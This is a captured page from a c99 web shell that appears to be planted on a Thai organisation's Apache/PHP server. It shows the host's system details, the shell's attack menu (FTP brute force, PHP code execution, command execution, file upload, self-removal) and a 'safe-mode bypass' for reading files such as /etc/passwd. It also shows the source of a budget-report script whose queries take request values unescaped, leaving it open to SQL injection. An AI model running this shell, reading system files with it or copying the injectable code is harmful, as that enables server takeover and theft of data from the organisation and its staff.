!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/develop_person_depart/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ReportPlaning.php (15.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../include/FunctionDB.php");
include(
"../include/Function.php");
include(
"admin_menu.php");
 
ConnectDB();
$sql "SELECT * FROM  project_tb  WHERE   Budget_Year='$Budget_Year'   and  Faculty_code='$Faculty_code'   ";
$result mysql_query($sql) or die(" Error").mysql_error();
$rs mysql_fetch_array($result);
$row mysql_num_rows($result);
$strSQL "Select * FROM  project_tb   WHERE    Budget_Year='$Budget_Year'   and  Faculty_code='$Faculty_code'  Order By   Date DESC ";
$result mysql_query($strSQL); 
$num mysql_num_rows($result );
if (! 
$Page)
$Page 1;
$Pre_Page $Page 1;
$Next_Page $Page +1;
$Per_Page 50;
$result mysql_query($strSQL);

$Page_start = ($Per_Page*$Page) - $Per_Page;
$Num_Rows mysql_num_rows($result);
if( 
$Num_Rows <= $Per_Page)
   
$Num_Pages 1;
else if ((
$Num_Rows $Per_Page) == 0)
       
$Num_Pages = ($Num_Rows $Per_Page);
else
        
$Num_Pages = ($Num_Rows $Per_Page) + 1;
$Num_Pages = (int)$Num_Pages;

if (( 
$Page $Num_Pages) || ($Page 0))
  echo
"Page $Page More than $Num_Pages";
$strSQL .=" LIMIT $Page_start,$Per_Page" ;
$result mysql_query($strSQL); 
$num mysql_num_rows($result );
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<link rel="stylesheet" href="../css/cart4.css" type="text/css">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<script type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
<style type="text/css">
<!--
.style1 {
    font-size: 14px;
    font-weight: bold;
}
.style2 {font-size: 14px}
.style3 {
    font-family: Tahoma;
    font-size: 14px;
}
.style16 {color: #FF0000}
.style19 {color: #000000}
-->
</style>
<table width="817" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="817"><br />
          <fieldset>
            <legend><span class="style3"><a href="Menu_Develop.php" class="style2">หน้าหลัก</a></span></legend>
            <br />
            <form id="form" name="form" method="get" action="SearchRepPlaning.php">
<font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font>
<table width="99%" border="0" align="center" cellpadding="0" cellspacing="0" style="background-color:#eeeeee; border:0px solid gray">
                  <tr bgcolor="#CCCCFF">
                    <td height="24" colspan="3" bgcolor="#FFFFFF" >&nbsp;</td>
                    <td height="24" bgcolor="#FFFFFF" >&nbsp;</td>
                    <td bgcolor="#FFFFFF" >&nbsp;</td>
                    <td height="24" bgcolor="#FFFFFF" >&nbsp;</td>
                    <td height="24" bgcolor="#FFFFFF" ><div align="right"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><span class="style2">ส่งออก <a href="ExcelReportPlaning.php?Budget_Year=<? echo $rs[Budget_Year]?>&Faculty_code=<? echo $rs[Faculty_code]?>"><img src="../picture/excel.gif" width="18" height="18" border="0" align="absmiddle" /></a></span></font></div></td>
                  </tr>
                  <tr bgcolor="#CCCCFF">
                    <td height="24" colspan="7" bgcolor="#FFFFFF" >&nbsp;</td>
                  </tr>

                  <tr bgcolor="#CCCCFF">
                    <td height="24" colspan="7" bgcolor="#FFFFFF" ><div align="center" class="style1"><span class="style2"><font color="#000000" face="Tahoma"><font face="Tahoma"><font color="#000000" face="Tahoma"> รายละเอียดการใช้เงินตามแผนดำเนินการประจำปีงบประมาณ </font></font></font></span><font color="#000000" face="Tahoma"><font face="Tahoma"><strong><font color="#000000" face="Tahoma"><strong><span class="style2"><font color="#000066" face="Tahoma"><font color="#000000" face="Tahoma"><font face="Tahoma"><strong><font size="2" face="Tahoma"><font color="#003399"><? echo $Budget_Year?></font> </font></strong></font></font></font></span></strong></font></strong><span class="style2"><font color="#000000" face="Tahoma"><font face="Tahoma"><font color="#000000" face="Tahoma"><font color="#000066" face="Tahoma"><font color="#000000" face="Tahoma"><font face="Tahoma"><font face="Tahoma"><font color="#000000" face="Tahoma">หน่วยงาน</font></font></font></font></font></font></font></font></span></font></font> <span class="style2"><font color="#000000" size="2" face="Tahoma">
                    <?php
         
//$Faculty_code  = $row[Faculty_code];
         
$sql3 "Select * From  faculty_tb   Where  Faculty_code='$Faculty_code'";
         
$result3 mysql_query($sql3) or die("Error".mysql_error());
         
$rss mysql_fetch_array($result3);
          echo
"$rss[Faculty_name]";
         
?>
                    </font></span></div></td>
                  </tr>
                  <tr bgcolor="#E6E6E6">
                    <td align="center" bgcolor="#FFFFFF" style="border:0px solid gray">&nbsp;</td>
                    <td colspan="2" align="center" bgcolor="#FFFFFF" style="border:0px solid gray">&nbsp;</td>
                    <td width="368" align="center" bgcolor="#FFFFFF" style="border:0px solid gray">&nbsp;</td>
                    <td width="93" align="center" bgcolor="#FFFFFF" style="border:0px solid gray">&nbsp;</td>
                    <td width="86" align="center" bgcolor="#FFFFFF" style="border:0px solid gray">&nbsp;</td>
                    <td align="center" bgcolor="#FFFFFF" style="border:0px solid gray">&nbsp;</td>
                  </tr>
                  <tr bgcolor="#E6E6E6">
                    <td width="22" height="25" align="center" bgcolor="#CCCCFF" style="border:0px solid gray"><span class="style3">No</span></td>
                    <td colspan="3" align="center" bgcolor="#CCCCFF" style="border:0px solid gray"><div align="left" class="style3"><font color="#000000">                      ปีงบประมาณ<font color="#000000"><strong><font color="#000000"><strong><font color="#000066"><strong> <span class="style16"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /></span> <font color="#003399"><? echo $Budget_Year?></font></strong></font></strong></font></strong></font></font> <span class="style16"><span class="style19">ภาค/ฝ่าย</span> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /></span> <font color="#000000">
                    <?php
         
//$Faculty_code  = $row[Faculty_code];
         
$sql3 "Select * From  faculty_tb   Where  Faculty_code='$Faculty_code'";
         
$result3 mysql_query($sql3) or die("Error".mysql_error());
         
$rss mysql_fetch_array($result3);
          echo
"$rss[Faculty_name]";
         
?>
                    </font></div>                      
                    <div align="left" class="style3"></div></td>
                    <td align="center" bgcolor="#CCCCFF" style="border:0px solid gray"><div align="right"><span class="style3">หมวดเงิน</span></div></td>
                    <td align="center" bgcolor="#CCCCFF" style="border:0px solid gray"><span class="style3">วันที่ดำเนินการ</span></td>
                    <td width="89" align="center" bgcolor="#CCCCFF" style="border:0px solid gray"><div align="right"><span class="style3">จำนวนเงิน</span></div></td>
          </tr>
                  <?php
$i 
1;
 while(
$row mysql_fetch_array($result))
 {

     if(
$count==0)
     {
?>
                  <tr bgcolor="#F7F7F7" >
                    <td align="center" bgcolor="#ECF5FF" ><font color="#996600" size="1" face="Tahoma">
                      <?=$i?>
                    </font></td>
                    <td width="31" align="center" bgcolor="#ECF5FF"  ><div align="left">
                      <?=$row["Orderlist"]?>  
                    </div>
                    </font></td>
                    <td colspan="2" align="center" bordercolor="#EEEEEE" bgcolor="#ECF5FF" > <font color="#996600" size="2" face="Tahoma">
                      <div align="left">
                        <?=$row["Training_name"]?>
                    </div></td>
                    <td bordercolor="#EEEEEE" bgcolor="#ECF5FF" ><div align="right"><font color="#0033CC" size="2" face="Tahoma">
                      <?php
        $MoneyId 
=  $row["MoneyId"];
         
$sql "Select * From money_tb   Where  MoneyId='$MoneyId' ";
          
$result1 mysql_query($sql) or die("Error".mysql_error());
          
$rss mysql_fetch_array($result1);
          echo 
"$rss[MoneyName]";
         
?>
                    </font></div></td>
                    <td bordercolor="#EEEEEE" bgcolor="#ECF5FF" ><div align="center"><font color="#003366" size="2" face="Tahoma">
                      <?php 
       $sday 
$row[Date];
    
$yearthai explode("-",$sday);
    
$day =      intval($yearthai[2]);
    
$month =  intval($yearthai[1]);
    
$year =     intval($yearthai[0]);     
          
//////////////////
 //   $yearthai =  $day ;
  
$m getThaiSubMonth($month);
     echo
"$day"." "."$m"." "."$year";
    
?>
                    </font></div></td>
                    <td bgcolor="#ECF5FF" ><div align="right"><font color="#993333" size="2" face="Tahoma"> <?echo number_format($row['Budget_use'],2,'.',','); ?> </font></div></td>
                  </tr>
                  <?
    $count
=1;
     }
else
{
?>
                  <tr bgcolor="#FFFFFF">
                    <td align="center" bordercolor="#FFFFFF" ><font color="#996600" size="1" face="Tahoma">
                      <?=$i?>
                    </font></td>
                    <td align="center" bordercolor="#EEEEEE" ><div align="left">
                      <?=$row["Orderlist"]?>
                    <font color="#003366" size="2" face="Tahoma"> </font><font color="#003366" size="2" face="Tahoma"> </font></div></td>
                    <td colspan="2" align="center" bordercolor="#EEEEEE" ><div align="left"><font color="#996600" size="2" face="Tahoma">
                      <?=$row["Training_name"]?>
                    </font></div></td>
                    <td bordercolor="#EEEEEE" ><div align="right"><font color="#0033CC" size="2" face="Tahoma">
                      <?php
        $MoneyId 
=  $row["MoneyId"];
         
$sql "Select * From money_tb   Where  MoneyId='$MoneyId' ";
          
$result1 mysql_query($sql) or die("Error".mysql_error());
          
$rss mysql_fetch_array($result1);
          echo 
"$rss[MoneyName]";
         
?>
                    </font></div></td>
                    <td bordercolor="#EEEEEE" ><div align="center"><font color="#003366" size="2" face="Tahoma">
                      <?php 
       $sday 
$row[Date];
    
$yearthai explode("-",$sday);
    
$day =      intval($yearthai[2]);
    
$month =  intval($yearthai[1]);
    
$year =     intval($yearthai[0]);     
          
//////////////////
 //   $yearthai =  $day ;
  
$m getThaiSubMonth($month);
     echo
"$day"." "."$m"." "."$year";
    
?>
                    </font></div></td>
                    <td bordercolor="#FFFFFF" bgcolor="#FFFFFF" ><div align="right"><font color="#993333" size="2" face="Tahoma"> <?echo number_format($row['Budget_use'],2,'.',','); ?> </font></div></td>
                  </tr>
                  <?
$count
=0;
}
$i++;
 }    
?>
                  <tr bgcolor="#FFFFFF">
                    <td colspan="7" align="center" ><table width="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                          <td bgcolor="#FFFFFF"><div align="right"><font color="#0033CC" size="2" face="Tahoma"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</strong></font><font color="#0033CC" face="Tahoma"><strong><span class="style2">&nbsp;&nbsp;</span></strong><span class="style2"><font color="#993333">&nbsp;จำนวนเงินที่ใช</font></span></font><font color="#0033CC" size="2" face="Tahoma"><strong><font color="#993333">้</font></strong></font></div></td>
                          <td bgcolor="#FFFFFF"><div align="right"><strong><font color="#993333" size="2" face="Tahoma">
                              <?php         
        
          $sql1 
"Select Sum(Budget_use) as SumB1 From project_tb Where  Budget_Year='$Budget_Year'  and Faculty_code='$Faculty_code'    ";
          
$result1 mysql_query($sql1) or die("Erro".mysql_error());
          
$rss1 mysql_fetch_array($result1);
           echo 
number_format($rss1[SumB1],2,'.',',');
           
//echo"$rss1[SumC1]";
           
?>
                          </font></strong></div></td>
                        </tr>
                        <tr>
                          <td bgcolor="#FFFFFF"><div align="right"><font color="#0033CC" size="2" face="Tahoma"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</strong></font><font color="#0033CC" face="Tahoma"><strong><span class="style2">&nbsp;</span></strong><span class="style2">&nbsp;&nbsp;<font color="#993333">วงเงินที่ตั้งไว้ตามแผน</font></span></font></div></td>
                          <td bgcolor="#FFFFFF"><div align="right"><strong><font color="#993333" size="2" face="Tahoma">
                            <?php         
        
          $sql2 
"Select Sum(Budget_use) as SumB2 From  project_type_tb   Where  Budget_Year='$Budget_Year'  and Faculty_code='$Faculty_code'    ";
          
$result2 mysql_query($sql2) or die("Erro".mysql_error());
          
$rss2 mysql_fetch_array($result2);
           echo 
number_format($rss2[SumB2],2,'.',',');
           
//echo"$rss1[SumC1]";
           
?>
                          </font></strong></div></td>
                        </tr>
                        <tr>
                          <td width="89%" bgcolor="#FFFFFF"><div align="right"><font color="#0033CC" size="2" face="Tahoma"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</strong></font><font color="#0033CC" face="Tahoma"><strong><span class="style2">&nbsp;</span></strong><span class="style2">&nbsp;&nbsp;<font color="#993333">คงเหลือเงินตามแผน</font></span></font></div></td>
                          <td width="11%" bgcolor="#FFFFFF"><div align="right"><strong><font color="#993333" size="2" face="Tahoma">
                              <?php
    $Delete3 
$rss2[SumB2] - $rss1[SumB1] ;
    echo 
number_format($Delete3,2,'.',',');
    
// echo"$Del4";
     
      
?>
                          </font></div></td>
                        </tr>
                        
                    </table></td>
                  </tr>
                  <tr bgcolor="#CCCCFF">
                    <td colspan="7" align="center" bgcolor="#FFFFFF" ><span class="style2"><font color="#000000" face="Tahoma">ทั้งหมด</font></span><font color="#003399" size="2" face="Tahoma"> <? echo $num ?></font> <span class="style2"><font color="#FFFFFF" face="Tahoma"><font color="#003366">รายการ</font><font color="#FFFFFF">&nbsp;</font></font></span></td>
                  </tr>
                  <tr bgcolor="#CCCCFF">
                    <td colspan="7" align="center" bgcolor="#FFFFFF" ><div align="center"><font color="#FFFFFF"><font color="#FFFFFF" size="3" face="MS Sans Serif"><strong><font color="#000000" size="2" face="Tahoma"><?php echo $Num_Pages;?></font></strong></font><font color="#000000" size="2" face="Tahoma"><strong>&nbsp;</strong>หน้า</font><font color="#000000" size="2" face="Tahoma"><strong>
                    <?php
if ($Pre_Page)
   echo
"<a href=\"$PHP_SELF?Page=$Pre_Page&Budget_Year=$Budget_Year&Faculty_code=$Faculty_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>&lt;&lt; Previus</b> </font></a>";

   for(
$i=1;$i<=$Num_Pages;$i++)
   {
    if(
$i != $Page)
         echo
" [<a href=\"$PHP_SELF?Page=$i&Budget_Year=$Budget_Year&Faculty_code=$Faculty_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>$i</b></font></a>] ";
    else
        echo
"<b>$i</b>";
   }
if(
$Page != $Num_Pages)
 echo
"<a href=\"$PHP_SELF?Page=$Next_Page&Budget_Year=$Budget_Year&Faculty_code=$Faculty_code\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b> Next &gt;&gt;</b> </font></a>";
 
?>
                    </strong></font></font></div></td>
                  </tr>
              </table>
            </form>
        
          </fieldset>
      </td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0085 ]--